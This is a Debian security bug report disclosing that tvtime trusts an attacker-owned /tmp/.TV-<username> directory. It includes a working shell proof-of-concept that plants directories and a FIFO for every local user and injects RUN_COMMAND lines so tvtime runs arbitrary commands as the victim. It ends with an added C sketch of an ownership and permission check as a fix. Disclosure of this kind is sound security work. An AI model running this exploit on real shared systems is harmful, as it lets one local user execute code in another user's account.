
Bug#924076: tvtime: insecure use of /tmp



Package: tvtime
Version: 1.0.11-4
Severity: grave
Tags: security

tvtime uses /tmp/.TV-<username>/ as a temporary directory, even when it belongs to another (potentially malicious) user. A local attacker can exploit this bug to execute arbitrary code in the context of a tvtime user.

I've attached a proof-of-concept exploit.

--
Jakub Wilk

#!/bin/sh
set -e -u
if ! command -v xeyes > /dev/null
then
    printf 'xeyes(1) not found. Please install x11-apps.\n' >&2
    exit 1
fi
cd /tmp
basedir=$(mktemp -d tvtime-exploit.XXXXXX)
chmod 755 "$basedir"
mkfifo -m 644 "$basedir/cmd"
mkfifo -m 666 "$basedir/ratelim"
hostname=$(hostname)
users=$(getent passwd | cut -d: -f1)
for user in $users
do
    userdir=".TV-$user"
    rm -rf "$userdir" || true  # maybe stale dir from the previous exploit run?
    if ! mkdir -m 755 "$userdir"
    then
        printf 'Failed to mount the exploit against %s; Maybe try again after reboot?\n' "$user"
        continue
    fi
    ln "$basedir/cmd" "$userdir/tvtimefifo-$hostname"
done
while true
do
    printf 'Waiting for the victim to run tvtime...' "$0" >&2
    printf 'RUN_COMMAND xeyes && echo x > /tmp/%s; true\n' "$basedir/ratelim" > "$basedir/cmd"
    printf '\n' >&2
    read x < "$basedir/ratelim"
done
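
The ownership check the report describes as missing, as an added example (not part of the original report and not tvtime's code). The helper name `open_private_dir` and the demo path are assumptions, and the symlink and permission checks go beyond the ownership case the report names.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* O_NOFOLLOW, O_DIRECTORY, O_CLOEXEC */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

static int reject(int fd, int err) { close(fd); errno = err; return -1; }

/* Hypothetical helper, not tvtime code: create or adopt a per-user
 * directory such as /tmp/.TV-<username>. Returns a directory fd, or -1
 * with errno set when the path cannot be trusted. */
int open_private_dir(const char *path)
{
    struct stat st;
    int fd;

    /* Create it owner-only; an existing entry is inspected below. */
    if (mkdir(path, 0700) != 0 && errno != EEXIST)
        return -1;
    /* O_NOFOLLOW refuses a planted symlink, O_DIRECTORY a FIFO or file. */
    fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    /* fstat() the descriptor so the checks apply to the object we hold. */
    if (fstat(fd, &st) != 0)
        return reject(fd, errno);
    if (st.st_uid != geteuid())            /* someone else got there first */
        return reject(fd, EPERM);
    if (st.st_mode & (S_IRWXG | S_IRWXO))  /* not owner-only */
        return reject(fd, EACCES);
    return fd;
}

int main(void)
{
    /* Constructed demo path; a real caller would append the user name. */
    int fd = open_private_dir("/tmp/.TV-demo");
    if (fd < 0) { perror("refusing /tmp/.TV-demo"); return EXIT_FAILURE; }
    puts("directory is private; create entries with openat()/mkfifoat()");
    close(fd);
    return EXIT_SUCCESS;
}
```

A caller that gets -1 should stop instead of using the path anyway, and should create its files or FIFOs relative to the returned descriptor so the checked directory is the one actually used.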
